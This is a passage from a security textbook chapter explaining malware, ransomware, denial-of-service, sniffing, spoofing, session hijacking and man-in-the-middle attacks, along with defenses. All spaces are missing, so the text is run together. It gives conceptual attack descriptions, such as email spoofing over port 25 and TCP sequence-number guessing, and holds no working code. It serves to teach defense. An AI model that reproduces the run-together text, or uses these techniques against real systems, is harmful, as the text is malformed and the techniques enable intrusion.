CommonbackdoorsincludeZeus,NetBus,andBackOrifice.Anyofthese,ifrunningonyoursystem,canallowanattackerremoteaccesstoyoursystem—accessthatallowsthemtoperformanyfunctiononyoursystem.
Ransomware
Ransomwareisaformofmalwarethatperformssomeactionandextractsransomfromauser.Themostcommonformofransomwareisonethatencryptsakeyfileorsetoffiles,renderingasystemunusable,ordatasetunavailable.Theattackerreleasestheinformationafterbeingpaid,typicallyinanontraceablemeanssuchasbitcoin.
Acurrentransomwarethreat,appearingin2013,isCryptoLocker.CryptoLockerisaTrojanhorsethatwillencryptcertainfilesusingRSApublickeyencryption.Whentheuserattemptstogetthefiles,theyareprovidedwithamessageinstructingthemhowtopurchasethedecryptionkey.BecauseCryptoLockeruses2048-bitRSAencryption,brute-forcedecryptionisoutoftherealmofrecoveryoptions.Thesystemishighlyautomatedandusershaveashorttimewindowtogettheprivatekey.Failuretogetthekeywillresultinthelossofthedata.
MalwareDefensesMalwareinallforms—virus,worm,spyware,botnet,andsoon—canbedefendedagainstinacoupleofsimplesteps:
UseanantivirusprogramMostmajor-vendorantivirussuitesaredesignedtocatchmostwidespreadformsofmalware.Insomemarkets,theantivirussoftwareisbeingreferredtoasanti-xsoftware,indicatingthatitcoversmorethanviruses.Butbecausethethreatenvironmentchangesliterallydaily,thesignaturefilesforthesoftwareneedregularupdates,whichmostantivirusprogramsoffertoperformautomatically.
KeepyoursoftwareuptodateManyformsofmalwareachievetheirobjectivesthroughexploitationofvulnerabilitiesinsoftware,bothintheoperatingsystemandapplications.Althoughoperatingsystemvulnerabilitieswerethemainsourceofproblems,todayapplication-levelvulnerabilitiesposethegreatestrisk.Unfortunately,whileoperatingsystemvendorsarebecomingmoreandmoreresponsivetopatching,mostapplicationvendorsarenot,andsome,likeAdobe,haveverylargefootprintsacrossmostmachines.
Oneofthechallengesinkeepingasystemuptodateiskeepingtrackofthesoftwarethatisonthesystem,andkeepingtrackofallvendorupdates.Therearesoftwareproducts,suchasSecunia’sPersonalSoftwareInspector(PSI)program,thatcanscanyourmachinetoenumerateallthesoftwareinstalledandverifythevendorstatusofeachproduct.Forstandalonemachines,suchastheoneinyourhome,thistypeofprogramisagreattime-savingitem.Inevensmallenterprises,thesetoolsareessentialtomanagethecomplexityofpatchesneededacrossthemachines.
TechTip
MalwareDefensesTherearetwoprimarydefensemechanismsagainstmalware:backupsandupdates.Malwareactsagainstvulnerabilities,whicharepatchedviakeepingsoftwareuptodate.Oneoftheprimarysourcesoflossisfrominabilitytorecover,somethingcoveredbybackups.
Application-LevelAttacksAttacksagainstasystemcanoccuratthenetworklevel,attheoperatingsystemlevel,attheapplicationlevel,orattheuserlevel(socialengineering).Earlyattackpatternswereagainstthenetwork,butmostoftoday’sattacksareaimedattheapplications.Thisisprimarilybecausethisiswheretheobjectiveofmostattacksresides;intheinfamouswordsofbankrobberWillieSutton,“becausethat’swherethemoneyis.”Infact,manyoftoday’sattacksonsystemsarecombinationsofusingvulnerabilitiesinnetworks,operatingsystems,andapplications,allmeanstoanendtoobtainthedesiredobjectiveofanattack,whichisusuallysomeformofdata.Application-levelattackstakeadvantageofseveralfactsassociatedwith
computerapplications.First,mostapplicationsarelargeprogramswrittenbygroupsofprogrammersand,bytheirnature,haveerrorsindesignandcodingthatcreatevulnerabilities.Foralistoftypicalvulnerabilities,seetheCommonVulnerabilityandExposures(CVE)listmaintainedbyMitre,
http://cve.mitre.org.Second,evenwhenvulnerabilitiesarediscoveredandpatchedbysoftwarevendors,endusersareslowtoapplypatches,asevidencedbytheSQLSlammerincidentinJanuary2003.Thevulnerabilityexploitedwasabufferoverflow,andthevendorsuppliedapatchsixmonthspriortotheoutbreak,yetthewormstillspreadquicklyduetothemultitudeofunpatchedsystems.
CrossCheckApplicationVulnerabilitiesApplicationsareacommontargetofattacks,asattackershaveshiftedtoeasiertargetsasthenetworkandOShavebecomemorehardened.WhatapplicationsarenotuptodateonthePCyouuseeveryday?Howwouldyouknow?Howwouldyouupdatethem?AmorecompleteexaminationofcommonapplicationvulnerabilitiesispresentedinChapter18.
AttackingComputerSystemsandNetworksFromahigh-levelstandpoint,attacksoncomputersystemsandnetworkscanbegroupedintotwobroadcategories:attacksonspecificsoftware(suchasanapplicationortheoperatingsystem)andattacksonaspecificprotocolorservice.Attacksonaspecificapplicationoroperatingsystemaregenerallypossiblebecauseofanoversightinthecode(andpossiblyinthetestingofthatcode)orbecauseofaflaw,orbug,inthecode(againindicatingalackofthoroughtesting).Attacksonspecificprotocolsorservicesareattemptseithertotakeadvantageofaspecificfeatureoftheprotocolorserviceortousetheprotocolorserviceinamannerforwhichitwasnotintended.Thissectiondiscussesvariousformsofattacksofwhichsecurityprofessionalsneedtobeaware.
Denial-of-ServiceAttacksAdenial-of-service(DoS)attackisanattackdesignedtopreventasystemorservicefromfunctioningnormally.ADoSattackcanexploita
knownvulnerabilityinaspecificapplicationoroperatingsystem,oritcanattackfeatures(orweaknesses)inspecificprotocolsorservices.InaDoSattack,theattackerattemptstodenyauthorizedusersaccesseithertospecificinformationortothecomputersystemornetworkitself.Thiscanbeaccomplishedbycrashingthesystem—takingitoffline—orbysendingsomanyrequeststhatthemachineisoverwhelmed.ThepurposeofaDoSattackcanbesimplytopreventaccesstothe
targetsystem,ortheattackcanbeusedinconjunctionwithotheractionstogainunauthorizedaccesstoacomputerornetwork.Forexample,aSYNfloodattackcanbeusedtopreventservicetoasystemtemporarilyinordertotakeadvantageofatrustedrelationshipthatexistsbetweenthatsystemandanother.SYNfloodingisanexampleofaDoSattackthattakesadvantageofthe
wayTCP/IPnetworksweredesignedtofunction,anditcanbeusedtoillustratethebasicprinciplesofanyDoSattack.SYNfloodingusestheTCPthree-wayhandshakethatestablishesaconnectionbetweentwosystems.Undernormalcircumstances,thefirstsystemsendsaSYNpackettothesystemwithwhichitwantstocommunicate.ThesecondsystemrespondswithaSYN/ACKifitisabletoaccepttherequest.WhentheinitialsystemreceivestheSYN/ACKfromthesecondsystem,itrespondswithanACKpacket,andcommunicationcanthenproceed.ThisprocessisshowninFigure15.1.
•Figure15.1TheTCPthree-wayhandshake
ASYN/ACKisactuallytheSYNpacketsenttothefirstsystemcombinedwithanACKpacketacknowledgingthefirstsystem’sSYNpacket.
InaSYNfloodingattack,theattackersendsfakecommunicationrequeststothetargetedsystem.Eachoftheserequestswillbeansweredbythetargetsystem,whichthenwaitsforthethirdpartofthehandshake.Sincetherequestsarefake(anonexistentIPaddressisusedintherequests,sothetargetsystemisrespondingtoasystemthatdoesn’texist),thetargetwillwaitforresponsesthatnevercome,asshowninFigure15.2.Thetargetsystemwilldroptheseconnectionsafteraspecifictime-outperiod,butiftheattackersendsrequestsfasterthanthetime-outperiodeliminatesthem,thesystemwillquicklybefilledwithrequests.Thenumberofconnectionsasystemcansupportisfinite,sowhenmorerequestscomeinthancanbeprocessed,thesystemwillsoonbereservingallitsconnectionsforfakerequests.Atthispoint,anyfurtherrequestsaresimplydropped(ignored),andlegitimateuserswhowanttoconnecttothetargetsystemwillnotbeabletodoso,becauseuseofthesystemhasbeendeniedtothem.
•Figure15.2ASYNflooding–basedDoSattack
AnothersimpleDoSattackistheinfamouspingofdeath(POD),anditillustratestheothertypeofattack—onetargetedataspecificapplicationoroperatingsystem,asopposedtoSYNflooding,whichtargetsaprotocol.InthePODattack,theattackersendsanInternetControlMessageProtocol(ICMP)pingpacketequalto,orexceeding,64KB.Certainoldersystemsarenotabletohandlethissizeofpacket,andthesystemwillhangorcrash.
DistributedDenial-of-ServiceDoSattacksareconductedusingasingleattackingsystem.ADoSattackemployingmultipleattackingsystemsisknownasadistributeddenial-of-service(DDoS)attack.ThegoalofaDDoSattackisalsotodenytheuseoforaccesstoaspecificserviceorsystem.DDoSattacksweremadefamousin2000withthehighlypublicizedattacksoneBay,CNN,Amazon,andYahoo!.
ExamTip:Abotnetisanetworkofmachinescontrolledbyamalicioususer.Eachofthesecontrolledmachinesiscommonlyreferredtoasazombie.
InaDDoSattack,serviceisdeniedbyoverwhelmingthetargetwithtrafficfrommanydifferentsystems.Anetworkofattackagents(sometimescalledzombies)iscreatedbytheattacker,anduponreceivingtheattackcommandfromtheattacker,theattackagentscommencesendingaspecifictypeoftrafficagainstthetarget.Iftheattacknetworkislargeenough,evenordinarywebtrafficcanquicklyoverwhelmthelargestofsites.CreatingaDDoSattacknetworkisnotasimpletask.Theattackagents
arenotwillingagents—theyaresystemsthathavebeencompromisedandonwhichtheDDoSattacksoftwarehasbeeninstalled.Tocompromise
theseagents,theattackerhastohavegainedunauthorizedaccesstothesystemortrickedauthorizeduserstorunaprogramthatinstalledtheattacksoftware.Thecreationoftheattacknetworkmayinfactbeamultistepprocessinwhichtheattackerfirstcompromisesafewsystemsandthenusesthosesystemsashandlersormasters,whichinturncompromiseothersystems.Oncethenetworkhasbeencreated,theagentswaitforanattackmessage,whichwillincludedataonthespecifictarget,beforelaunchingtheattack.OneimportantaspectofaDDoSattackisthatwithjustafewmessagestotheagents,theattackercanhaveafloodofmessagessentagainstthetargetedsystem.Figure15.3illustratesaDDoSnetworkwithagentsandhandlers.
•Figure15.3DDoSattack
TechTip
EdgeBlockingofICMPBlockingICMPattheedgedeviceofthenetworkwillpreventICMP-basedattacksfromexternalsiteswhilestillallowingfullICMPfunctionalityfortrafficinsidethenetwork.CommonpracticeistoblockICMPattheedgeofIPv4networks,althoughinIPv6,ICMPisamust-carryitemandcannotbeblocked.
AfinaloptionyoushouldconsiderthatwilladdressseveralformsofDoSandDDoSattacksistoblockICMPpacketsatyourborder,sincemanyattacksrelyonICMP.BlockingICMPpacketsattheborderdevicespreventsexternalICMPpacketsfromenteringyournetwork,andwhilethismayblocksomefunctionality,itwillleaveinternalICMPfunctionalityintact.ItisalsopossibletoblockspecificformsofICMP;blockingType8,forinstance,willblockICMP-basedpingsweeps.ItisworthnotingthatnotallpingsoccurviaICMP;sometools,suchashping2,useTCPandUDPtocarrypingmessages.
SmurfAttackInaspecificDoSattackknownasasmurfattack,theattackersendsaspoofedpackettothebroadcastaddressforanetwork,whichdistributesthepackettoallsystemsonthatnetwork.FurtherdetailsarelistedintheIPAddressSpoofingsection.
DefendingAgainstDOS-TypeAttacksHowcanyoustopormitigatetheeffectsofaDoSorDDoSattack?Oneimportantprecautionistoensurethatyouhaveappliedthelatestpatchesandupgradestoyoursystemsandtheapplicationsrunningonthem.Onceaspecificvulnerabilityisdiscovered,itdoesnottakelongbeforemultipleexploitsarewrittentotakeadvantageofit.Generallyyouwillhaveasmallwindowofopportunityinwhichtopatchyoursystembetweenthetimethevulnerabilityisdiscoveredandthetimeexploitsbecomewidelyavailable.
Avulnerabilitycanalsobediscoveredbyhackers,andexploitsprovidethefirstcluesthatasystemhasbeencompromised.Attackerscanalsoreverse-engineerpatchestolearnwhatvulnerabilitieshavebeenpatched,allowingthemtoattackunpatchedsystems.Anotherapproachinvolveschangingthetime-outoptionforTCP
connectionssothatattackssuchastheSYNfloodingattackaremoredifficulttoperform,becauseunusedconnectionsaredroppedmorequickly.ForDDoSattacks,muchhasbeenwrittenaboutdistributingyourown
workloadacrossseveralsystemssothatanyattackagainstyoursystemwouldhavetotargetseveralhoststobecompletelysuccessful.WhilethisiseffectiveagainstsomeDDoSattacks,iflargeenoughDDoSnetworksarecreated(withtensofthousandsofzombies,forexample),anynetwork,nomatterhowmuchtheloadisdistributed,canbesuccessfullyattacked.Suchanapproachalsoinvolvesadditionalcoststoyourorganizationtoestablishthisdistributedenvironment.Addressingtheprobleminthismannerisactuallyanattempttomitigatetheeffectoftheattack,ratherthanpreventingorstoppinganattack.TopreventaDDoSattack,youmusteitherbeabletointerceptorblock
theattackmessagesorkeeptheDDoSnetworkfrombeingestablishedinthefirstplace.Toolshavebeendevelopedthatwillscanyoursystems,searchingforsleepingzombieswaitingforanattacksignal.Manyofthecurrentantivirus/spywaresecuritysuitetoolswilldetectknownzombie-typeinfections.Theproblemwiththistypeofpreventionapproach,however,isthatitisnotsomethingyoucandotopreventanattackonyournetwork—itissomethingyoucandotokeepyournetworkfrombeingusedtoattackothernetworksorsystems.Youhavetorelyonthecommunityofnetworkadministratorstotesttheirownsystemstopreventattacksonyours.
War-DialingandWar-DrivingWar-dialingisthetermusedtodescribeanattacker’sattempttodiscoverunprotectedmodemconnectionstocomputersystemsandnetworks.The
term’soriginisthe1983movieWarGames,inwhichthestarhashismachinesystematicallycallasequenceofphonenumbersinanattempttofindacomputerconnectedtoamodem.Inthecaseofthemovie,theintentwastofindamachinewithgamestheattackercouldplay,thoughobviouslyanattackercouldhaveotherpurposesonceaccessisobtained.War-dialingwassurprisinglysuccessful,mostlybecauseofrogue
modems—unauthorizedmodemsattachedtocomputersonanetworkbyauthorizedusers.Generallythereasonforattachingthemodemisnotmalicious—anindividualmaysimplywanttobeabletogohomeandthenconnecttotheorganization’snetworktocontinueworking.ThishasbecomehistorywiththeriseofremotedesktoptechnologyandubiquitousInternetconnectivity.Anotheravenueofattackoncomputersystemsandnetworkshasseena
tremendousincreaseoverthelastfewyearsbecauseoftheincreaseintheuseofwirelessnetworks.War-drivingistheunauthorizedscanningforandconnectingtowirelessaccesspoints,frequentlydonewhiledrivingnearafacility.Wirelessnetworkshavesomeobviousadvantages—theyfreeemployeesfromthecableconnectiontoaportontheirwall,allowingthemtomovethroughoutthebuildingwiththeirlaptopsandstillbeconnected.
CrossCheckWirelessVulnerabilitiesWirelesssystemshavetheirownvulnerabilitiesuniquetothewirelessprotocols.Wirelesssystemsarebecomingverycommon.Ifyourmachineiswirelesscapable,howmanywirelessaccesspointscanyouseefromyourcurrentlocation?Securingwirelesssystemsfromunauthorizedaccessisanessentialelementofacomprehensivesecurityprogram.ThismaterialiscoveredindepthinChapter12.
SocialEngineeringSocialengineeringreliesonliesandmisrepresentation,whichanattackerusestotrickanauthorizeduserintoprovidinginformationoraccesstheattackerwouldnotnormallybeentitledto.Theattackermight,for
example,contactasystemadministratorandpretendtobeanauthorizeduser,askingtohaveapasswordreset.Anothercommonployistoposeasarepresentativefromavendorwhoneedstemporaryaccesstoperformsomeemergencymaintenance.Socialengineeringalsoappliestophysicalaccess.Simpletechniquesincludeimpersonatingpizzaorflowerdeliverypersonneltogainphysicalaccesstoafacility.Attackersknowthat,duetopoorsecuritypractices,iftheycangain
physicalaccesstoanoffice,thechancesaregoodthat,givenalittleunsupervisedtime,auserIDandpasswordpairmightbefoundonanotepadorstickynote.Unsupervisedaccessmightnotevenberequired,dependingonthequalityofthesecuritypracticesoftheorganization.Oneoftheauthorsofthisbookwasonceconsideringopeninganaccountatabanknearhishome.Ashesatdownatthedeskacrossfromthebankemployeetakinghisinformation,theauthornoticedoneoftheinfamouslittleyellownotesattachedtothecomputermonitortheemployeewasusing.Thenoteread“passwordforJuneisjunejune.”Itprobablyisn’ttoohardtoguesswhatJuly’spasswordmightbe.Unfortunately,thisisalltoooftenthestateofsecuritypracticesinmostorganizations.Withthatinmind,itiseasytoseehowsocialengineeringmightworkandmightprovidealltheinformationanattackerneedstogainunauthorizedaccesstoasystemornetwork.
NullSessionsMicrosoftWindowssystemspriortoXPandServer2003exhibitedavulnerabilityintheirServerMessageBlock(SMB)systemthatalloweduserstoestablishnullsessions.AnullsessionisaconnectiontoaWindowsinterprocesscommunicationsshare(IPC$).ThegoodnewsisthatWindowsXP,Server2003,andbeyondarenotsusceptibletothisvulnerabilitybydefault.
Sniffing
ThegroupofprotocolsthatmakesuptheTCP/IPsuitewasdesignedtoworkinafriendlyenvironmentinwhicheverybodywhoconnectedtothenetworkusedtheprotocolsastheyweredesigned.Theabuseofthisfriendlyassumptionisillustratedbynetwork-trafficsniffingprograms,sometimesreferredtoassniffers.SniffingiswhensomeoneexaminesallthenetworktrafficthatpassestheirNIC,whetheraddressedforthemornot.Anetworksnifferisasoftwareorhardwaredevicethatisusedto
observetrafficasitpassesthroughanetworkonsharedbroadcastmedia.Thedevicecanbeusedtoviewalltraffic,oritcantargetaspecificprotocol,service,orevenstringofcharacters(lookingforlogins,forexample).Normally,thenetworkdevicethatconnectsacomputertoanetworkisdesignedtoignorealltrafficthatisnotdestinedforthatcomputer.Networksniffersignorethisfriendlyagreementandobservealltrafficonthenetwork,whetherdestinedforthatcomputerorothers,asshowninFigure15.4.Somenetworksniffersaredesignednotjusttoobservealltrafficbuttomodifytrafficaswell.Networksniffingismoredifficultinswitchednetworkenvironmentsduetothewaycollisiondomainsareeliminatedinfull-duplexswitching,butcertaintechniquescanbeused(spanningports,ARPpoisoning,andattacksforcingaswitchtofailandactasahub)tocircumventthis.
•Figure15.4Networksnifferslistentoallnetworktraffic.
Networksnifferscanbeusedbynetworkadministratorstomonitornetworkperformance.Theycanbeusedtoperformtrafficanalysis,forexample,todeterminewhattypeoftrafficismostcommonlycarriedonthenetworkandtodeterminewhichsegmentsaremostactive.Theycan
alsobeusedfornetworkbandwidthanalysisandtotroubleshootcertainproblems(suchasduplicateMACaddresses).
ExamTip:Anetworkinterfacecard(NIC)thatislisteningtoallnetworktrafficandnotjustitsownissaidtobein“promiscuousmode.”
Networksnifferscanalsobeusedbyattackerstogatherinformationthatcanbeusedinpenetrationattempts.Informationsuchasanauthorizedusernameandpasswordcanbeviewedandrecordedforlateruse.Thecontentsofe-mailmessagescanalsobeviewedasthemessagestravelacrossthenetwork.Itshouldbeobviousthatadministratorsandsecurityprofessionalswillnotwantunauthorizednetworksniffersontheirnetworksbecauseofthesecurityandprivacyconcernstheyintroduce.Fortunately,fornetworksnifferstobemosteffective,theyneedtobeontheinternalnetwork,whichgenerallymeansthatthechancesforoutsiderstousethemagainstyouareextremelylimited.Thisisanotherreasonthatphysicalsecurityisanimportantpartofinformationsecurityintoday’senvironment.
CrossCheckPhysicalAccessandSecurityOneofthechallengesinamodernnetworkisgettingaconnectiontoapointinthenetworkwhereyoursniffingwillresultinthediscoveryofinterestinginformation.Gettingaccesstoanopenport,ortoanequipmentroomwhereroutersandswitchesaremaintained,isafailureofphysicalsecurity.Physicalsecurityisanimportantcomponentofacomprehensiveinformationsecurityprogram.Atthispointaskyour-self—wherecanIconnectintomycompanynetwork?CanIgetconnectionsnearhigh-valuetargetssuchasdatabaseservers?DetailsonphysicalsecuritymeasuresarecoveredinChapter8.
Spoofing
Spoofingisnothingmorethanmakingdatalooklikeithascomefromadifferentsource.ThisispossibleinTCP/IPbecauseofthefriendlyassumptionsbehindtheprotocols.Whentheprotocolsweredeveloped,itwasassumedthatindividualswhohadaccesstothenetworklayerwouldbeprivilegeduserswhocouldbetrusted.
TechTip
WhatIsSpoofing?Spoofingiswhenyouassemblepacketswithfalseheaderinformationtodeceivethereceiverastothetrueaddressofthesender.Thiscanbedonetomanipulatereturnpacketsinthecaseofpingsweeps,ortoprovideanonymityfore-mails.
Whenapacketissentfromonesystemtoanother,itincludesnotonlythedestinationIPaddressandportbutthesourceIPaddressaswell.Youaresupposedtofillinthesourcewithyourownaddress,butnothingstopsyoufromfillinginanothersystem’saddress.Thisisoneoftheseveralformsofspoofing.
SpoofingE-MailIne-mailspoofing,amessageissentwithaFromaddressthatdiffersfromthatofthesendingsystem.Thiscanbeeasilyaccomplishedinseveraldifferentwaysusingseveralprograms.Todemonstratehowsimpleitistospoofane-mailaddress,youcanTelnettoport25(theportassociatedwithe-mail)onamailserver.Fromthere,youcanfillinanyaddressfortheFromandTosectionsofthemessage,whetherornottheaddressesareyoursorevenactuallyexist.Youcanuseseveralmethodstodeterminewhetherane-mailmessage
wassentbythesourceitclaimstohavebeensentfrom,butmostusersdonotquestiontheire-mailandwillacceptasauthenticwhereitappearstohaveoriginated.Avariationone-mailspoofing,thoughnottechnicallyspoofing,isfortheattackertoacquireaURLsimilartotheURLtheywant
tospoofsothate-mailsentfromtheirsystemappearstohavecomefromtheofficialsite—untilyoureadtheaddresscarefully.Forexample,ifattackerswanttospoofXYZCorporation,whichownsXYZ.com,theattackersmightgainaccesstotheURLXYZ.Corp.com.Anindividualreceivingamessagefromthespoofedcorporationsitewouldnotnormallysuspectittobeaspoofbutwouldtakeittobeofficial.Thissamemethodcanbe,andhasbeen,usedtospoofwebsites.If,however,theattackersmadetheirspoofedsiteappearsimilartotheofficialone,theycouldeasilyconvincemanypotentialviewersthattheywereattheofficialsite.Today,many.comandotherdomainsofcommonsites,aswellascommontyposofURLs,arepurchasedanddirectedtothelegitimatesite.
CrossCheckE-mailSpoofingE-mailwascreatedinanerawithadifferentsecurityenvironment,onewhereattributionwasnotevenanafterthought.Thishasledtoissuesassociatedwithtrustregardinge-mails.Fulldetailsofsecuringe-mailsiscoveredinChapter16.
IPAddressSpoofingIPisdesignedtoworksothattheoriginatorsofanyIPpacketincludetheirownIPaddressintheFromportionofthepacket.Whilethisistheintent,nothingpreventsasystemfrominsertingadifferentaddressintheFromportionofthepacket.ThisisknownasIPaddressspoofing.AnIPaddresscanbespoofedforseveralreasons.InaspecificDoSattackknownasasmurfattack,theattackersendsaspoofedpackettothebroadcastaddressforanetwork,whichdistributesthepackettoallsystemsonthatnetwork.Inthesmurfattack,thepacketsentbytheattackertothebroadcastaddressisanechorequestwiththeFromaddressforgedsothatitappearsthatanothersystem(thetargetsystem)hasmadetheechorequest.Thenormalresponseofasystemtoanechorequestisanechoreply,anditisusedinthepingutilitytoletauserknowwhetheraremotesystemisreachableandisresponding.Inthesmurfattack,therequestissenttoallsystemson
thenetwork,soallwillrespondwithanechoreplytothetargetsystem,asshowninFigure15.5.Theattackerhassentonepacketandhasbeenabletogenerateasmanyas254responsesaimedatthetarget.Shouldtheattackersendseveralofthesespoofedrequests,orsendthemtoseveraldifferentnetworks,thetargetcanquicklybecomeoverwhelmedwiththevolumeofechorepliesitreceives.
•Figure15.5SmurfingusedinasmurfDOSattack
ExamTip:Asmurfattackallowsanattackertouseanetworkstructuretosendlargevolumesofpacketstoavictim.BysendingICMPrequeststoabroadcastIPaddress,withthevictimasthesourceaddress,themultitudesofreplieswillfloodthevictimsystem.
SpoofingandTrustedRelationshipsSpoofingcanalsotakeadvantageofatrustedrelationshipbetweentwosystems.Iftwosystemsareconfiguredtoaccepttheauthenticationaccomplishedbyeachother,anindividualloggedontoonesystemmightnotbeforcedtogothroughanauthenticationprocessagaintoaccesstheothersystem.Anattackercantakeadvantageofthisarrangementbysendingapackettoonesystemthatappearstohavecomefromatrustedsystem.Sincethetrustedrelationshipisinplace,thetargetedsystemmayperformtherequestedtaskwithoutauthentication.Sinceareplywilloftenbesentonceapacketisreceived,thesystem
thatisbeingimpersonatedcouldinterferewiththeattack,sinceitwouldreceiveanacknowledgmentforarequestitnevermade.TheattackerwillofteninitiallylaunchaDoSattack(suchasaSYNfloodingattack)totemporarilytakeoutthespoofedsystemfortheperiodoftimethattheattackerisexploitingthetrustedrelationship.Oncetheattackiscompleted,theDoSattackonthespoofedsystemwouldbeterminated,andthesystemadministrators,apartfromhavingatemporarilynonresponsivesystem,mightnevernoticethattheattackoccurred.Figure15.6illustratesaspoofingattackthatincludesaSYNfloodingattack.
•Figure15.6Spoofingtotakeadvantageofatrustedrelationship
Becauseofthistypeofattack,administratorsareencouragedtostrictlylimitanytrustedrelationshipsbetweenhosts.FirewallsshouldalsobeconfiguredtodiscardanypacketsfromoutsideofthefirewallthathaveFromaddressesindicatingtheyoriginatedfrominsidethenetwork(asituationthatshouldnotoccurnormallyandthatindicatesspoofingisbeingattempted).
SpoofingandSequenceNumbersHowcomplicatedthespoofingisdependsheavilyonseveralfactors,includingwhetherthetrafficisencryptedandwheretheattackerislocatedrelativetothetarget.Spoofingattacksfrominsideanetwork,forexample,aremucheasiertoperformthanattacksfromoutsideofthenetwork,becausetheinsideattackercanobservethetraffictoandfromthetargetandcandoabetterjobofformulatingthenecessarypackets.Formulatingthepacketsismorecomplicatedforexternalattackers
becauseasequencenumberisassociatedwithTCPpackets.Asequence
numberisa32-bitnumberestablishedbythehostthatisincrementedforeachpacketsent.Packetsarenotguaranteedtobereceivedinorder,andthesequencenumbercanbeusedtohelpreorderpacketsastheyarereceivedandtorefertopacketsthatmayhavebeenlostintransmission.IntheTCPthree-wayhandshake,twosetsofsequencenumbersare
created,asshowninFigure15.7.ThefirstsystemchoosesasequencenumbertosendwiththeoriginalSYNpacket.ThesystemreceivingthisSYNpacketacknowledgeswithaSYN/ACK.Itsendsanacknowledgmentnumberback,whichisbasedonthefirstsequencenumberplusone(thatis,itincrementsthesequencenumbersenttoitbyone).Itthenalsocreatesitsownsequencenumberandsendsthatalongwithit.TheoriginalsystemreceivestheSYN/ACKwiththenewsequencenumber.ItincrementsthesequencenumberbyoneandusesitastheacknowledgmentnumberintheACKpacketwithwhichitresponds.
•Figure15.7Three-wayhandshakewithsequencenumbers
Thedifferenceinthedifficultyofattemptingaspoofingattackfrominsideanetworkandfromoutsideinvolvesdeterminingthesequencenumber.Iftheattackerisinsideofthenetworkandcanobservethetrafficwithwhichthetargethostresponds,theattackercaneasilyseethesequencenumberthesystemcreatesandcanrespondwiththecorrectsequencenumber.Iftheattackerisexternaltothenetworkandthesequencenumberthetargetsystemgeneratesisnotobserved,itisnexttoimpossiblefortheattackertoprovidethefinalACKwiththecorrectsequencenumber.Sotheattackerhastoguesswhatthesequencenumber
mightbe.Sequencenumbersaresomewhatpredictable,basedontheoperating
systemsinquestion.Sequencenumbersforeachsessionarenotstartedfromthesamenumber,sothatdifferentpacketsfromdifferentconcurrentconnectionswillnothavethesamesequencenumbers.Instead,thesequencenumberforeachnewconnectionisincrementedbysomelargenumbertokeepthenumbersfrombeingthesame.Thesequencenumbermayalsobeincrementedbysomelargenumbereverysecond(orsomeothertimeperiod).Anexternalattackerhastodeterminewhatvaluesareusedfortheseincrements.Theattackercandothisbyattemptingconnectionsatvarioustimeintervalstoobservehowthesequencenumbersareincremented.Oncethepatternisdetermined,theattackercanattemptalegitimateconnectiontodeterminethecurrentvalue,andthenimmediatelyattemptthespoofedconnection.Thespoofedconnectionsequencenumbershouldbethelegitimateconnectionincrementedbythedeterminedvalueorvalues.Sequencenumbersarealsoimportantinsessionhijacking,whichis
discussedinthefollowingsection.Whenanattackerspoofsaddressesandimposeshispacketsinthemiddleofanexistingconnection,thisistheman-in-the-middleattack.
TCP/IPHijackingTCP/IPhijackingandsessionhijackingaretermsusedtorefertotheprocessoftakingcontrolofanalreadyexistingsessionbetweenaclientandaserver.Theadvantagetoanattackerofhijackingoverattemptingtopenetrateacomputersystemornetworkisthattheattackerdoesn’thavetocircumventanyauthenticationmechanisms,sincetheuserhasalreadyauthenticatedandestablishedthesession.Oncetheuserhascompletedtheauthenticationsequence,theattackercanthenusurpthesessionandcarryonasiftheattacker,andnottheuser,hadauthenticatedwiththesystem.Topreventtheuserfromnoticinganythingunusual,theattackercandecidetoattacktheuser’ssystemandperformaDoSattackonit,takingit
downsothattheuser,andthesystem,willnotnoticetheextratrafficthatistakingplace.HijackattacksgenerallyareusedagainstwebandTelnetsessions.
Sequencenumbersastheyapplytospoofingalsoapplytosessionhijacking,sincethehijackerwillneedtoprovidethecorrectsequencenumbertocontinuetheappropriatedsessions.
Man-in-the-MiddleAttacksAman-in-the-middleattack,asthenameimplies,generallyoccurswhenattackersareabletoplacethemselvesinthemiddleoftwootherhoststhatarecommunicating.Ideally,thisisdonebyensuringthatallcommunicationgoingtoorfromthetargethostisroutedthroughtheattacker’shost(whichcanbeaccomplishediftheattackercancompromisetherouterforthetargethost).Theattackercanthenobservealltrafficbeforerelayingitandcanactuallymodifyorblocktraffic.Tothetargethost,itappearsthatcommunicationisoccurringnormally,sinceallexpectedrepliesarereceived.Figure15.8illustratesthistypeofattack.
•Figure15.8Aman-in-the-middleattack
Therearenumerousmethodsofinstantiatingaman-in-the-middleattack;oneofthecommonmethodsisviasessionhijacking.Sessionhijackingcanoccurwheninformationsuchasacookieisstolen,allowingtheattackertoimpersonatethelegitimatesession.Thisattackcanbeasaresultofacross-sitescriptingattack,whichtricksauserintoexecutingcoderesultingincookietheft.Theamountofinformationthatcanbeobtainedinaman-in-the-middleattackwillobviouslybelimitedifthecommunicationisencrypted.Eveninthiscase,however,sensitiveinformationcanstillbeobtained,sinceknowingwhatcommunicationisbeingconducted,andbetweenwhichindividuals,may,infact,provideinformationthatisvaluableincertaincircumstances.
Man-in-the-MiddleAttacksonEncryptedTrafficTheterm“man-in-the-middleattack”issometimesusedtorefertoamorespecifictypeofattack—oneinwhichtheencryptedtrafficissueisaddressed.IfyouwantedtocommunicatesecurelywithyourfriendBob,youmightaskhimforhispublickeysoyoucouldencryptyourmessagestohim.You,inturn,wouldsupplyBobwithyourpublickey.Anattackercanconductaman-in-the-middleattackbyinterceptingyourrequestforBob’spublickeyandthesendingofyourpublickeytohim.Theattackerwouldreplaceyourpublickeywiththeirpublickey,andshewouldsendthisontoBob.Theattacker’spublickeywouldalsobesenttoyoubytheattackerinsteadofBob’spublickey.NowwheneitheryouorBobencryptsamessage,itwillbeencryptedusingtheattacker’spublickey,enablingtheattackertointerceptit,decryptit,andthensenditonbyre-encryptingitwiththeappropriatekeyforeitheryouorBob.Eachofyouthinksyouaretransmittingmessagessecurely,butinrealityyourcommunicationhasbeencompromised.Well-designedcryptographicproductsusetechniquessuchasmutualauthenticationtoavoidthisproblem.
